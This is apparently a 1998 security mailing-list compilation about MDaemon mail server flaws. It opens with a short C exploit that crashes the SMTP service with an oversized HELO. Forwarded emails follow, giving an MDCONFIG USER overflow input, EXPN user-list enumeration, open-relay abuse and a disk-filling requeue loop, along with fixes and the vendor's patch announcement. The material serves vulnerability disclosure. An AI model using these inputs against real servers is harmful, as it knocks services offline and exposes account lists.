/* * MDaemon SMTP server for Windows buffer overflow exploit * * http://www.mdaemon.com - if you dare... * * Tested on MDaemon 2.71 SP1 * * http://www.rootshell.com/ * * Released 3/10/98 * * (C) 1998 Rootshell All Rights Reserved * * For educational use only. Distribute freely. * * Note: This exploit will also crash the Microsoft Exchange SMTP mail * connector if SP2 has NOT been installed. * * Danger! * * A malicous user could use this bug to execute arbitrary code on the * remote system. * */ #include #include #include #include #include #include #include void main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *hp; char *buffer; int sock, i; if (argc != 2) { printf("usage: %s \n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if (hp==NULL) { printf("Unknown host: %s\n",argv[1]); exit(1); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(25); sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); buffer = (char *)malloc(10000); sprintf(buffer, "HELO "); for (i = 0; i<4096; i++) strcat(buffer, "x"); strcat(buffer, "\r\n"); write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); } -- cut here -- Rootshell note: The config manager appears to run on port 8081. Date: Wed, 11 Mar 1998 05:33:53 +0100 From: Alvaro Martinez Echevarria Subject: DoS (and possibly more) on MDaemon for NT/95 Hi there. Around a month ago I sent the following message to sales@mdaemon.com. In a few words: there's a security problem in the SMTP/POP/WebPop software they provide for evaluation (and probably also in the commercial version they sell, see www.mdaemon.com), that lets you kill SMTP and POP services provided that you can connect to a sort of configuration port the programs use (in the configuration I tested the port was N+1, for N being the port used by WebPop). My knowledge on Windoze asymptotically approaches zero, so I cannot give much more details. I haven't received any interesting message from @mdaemon.com, apart from "we'll forward this information to our developers" (?); and I've seen nothing related to this security problem in their web so far, so the time has come to post to bugtraq, I guess. Possible workaround: block that port using a firewall. Just in case anyone out there is crazy enough to use this thing ;-). Regards. .------------------------------------------------------------------. | Alvaro Martínez Echevarría | LANDER SISTEMAS | | alvaro@lander.es | Pº Castellana, 121 | --------------------------------| 28046 Madrid, SPAIN | | Tel: +34-1-5562883 | | Fax: +34-1-5563001 | ---------------------------------' ---------- Forwarded message ---------- From: Alvaro Martinez Echevarria To: sales@mdaemon.com Date: Sun, 15 Feb 1998 19:59:03 +0100 (CET) Subject: DoS attack on MDaemon Hi there. I have found a really easy to use DoS attack on your MDaemon server, which some people here in my company have been evaluating. They asked me to take a look at the security of the product, and the very first thing I tried just brought the SMTP/POP services down. It was easy: I connected to a port whose greeting says "+OK xxx.xxx MDCONFIG Interface Ready", and after some trial and error this is what I found: VERS 3.0 +OK MDConfig v3.0 acceptable. USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...] The "a" here needs to be repeated a lot of times, say 2000. And after that, voilà: "Connection closed by foreign host" and let die the SMTP and POP services. As you should know, this same bug could be used in a more clever way to execute arbitrary code in any server that is using your MDaemon software. I think you should correct this problem right away, and pay more attention to bounds checking in your future development. Regards. -------------------------------------------------------------------- Date: Sat, 07 Mar 1998 01:05:23 +0000 To: info@rootshell.com Subject: Alt-Mdaemon (more thingys) hrmm, I have a 3 computer lan at my residence, One NT workstation box (Main webserver, firewall, ftp etc), a windows95 box (mail server, general stupid things), and a linux box (just have it around for the funk of it) the mail server uns mdaemon. This is not really the first of these exploits tho, and I know for a fact this guy did not come up with it. I have been using this product for well over a month now, and a couple of weeks ago I made a rather large post to http://www.deerfield.net/forums/Index.cfm?CFApp=50 about different bugs that coud be detrimental to email servers. One was this attack, there are three others that are not documented. Quick fix for the First DoS attack -- Most of the time, you wont get hundreds of people attacking your server, usually its just one guy doign this just to be cool, and say he can do somthing. All you really have to do is look back at your logs (which it keeps good track of) and use the IP Screening feature on the server, block all incoming connections from *.33.33.33.3. He will be immidiatly disconnected from the server opon connection. Getting a listing of every single user on an mdaemon server ------- Simply put this is a default setting that most sysadmins over look when they use the program, but as default every time the admin makes a new account it gets added to an email list called EVERYONE (everyone@blah.com), now when you telnet to a mdaemon server's smtp port you recive the norm, but type in the regullar command EXPN and you get a very wierd message, for example EXPN suzy No such mailing list Now since that default list EVERYONE is there all we have to do is a EXPN Everyone and we get a full listing of their users Simple fix? Delete everyone from the EVERYONE mailing list, make a new mailing list IE everyone5, or use the HIDE from Expn feature. Anti-spam with Mdaemon? I think not ---- Nope, no anti spam thingys...feel free to send anonymous email via a mdaemon server! Slowly but surley fill up a hardrive (another DoS) --- if you send email from an unknown user on a mdaemon server, IE fjkdals@mdaemonserver.com to the same address IE fjkdals@mdaemonserver.com for some reason the message will queue and requue over and over again..I havnt looked into this one as much as the other but oh well, simple fix, delete the requeing message from the hard drive. Hope this helps some of the readers -------------------------------------------------------------------- Date: Thu, 12 Mar 1998 12:02:42 -0600 From: Development Team Subject: Problems with MDaemon 2.7.1 Greetings! This is Arvel Hathcock the author of MDaemon. I just wanted to thank the manager and membership of this mailing list for providing a valuable service in pointing out bugs in our software. The problem mentioned earlier to the list about SMTP buffer overruns was reported to me in Feb. That very same day I fixed this problem for what we call "Service/Update Pack 2" and sent it to our beta test team members. Service/Update Pack 2 for Mdaemon 2.7 will be publically available at www.mdaemon.com TODAY - this afternoon or evening. We move quickly when errors such as these are reported to us. I don't pretend to have flawlessly perfect software but I do know that an error only needs to be reported to me one time and then I get it fixed fast - our customers can vouch for that. Anyway, just wanted to thank you all for pointing out this error. The more sources of information I can get on errors the happier I am and the quicker I can fix things. Thanks again! Arvel Hathcock Alt-N Technologies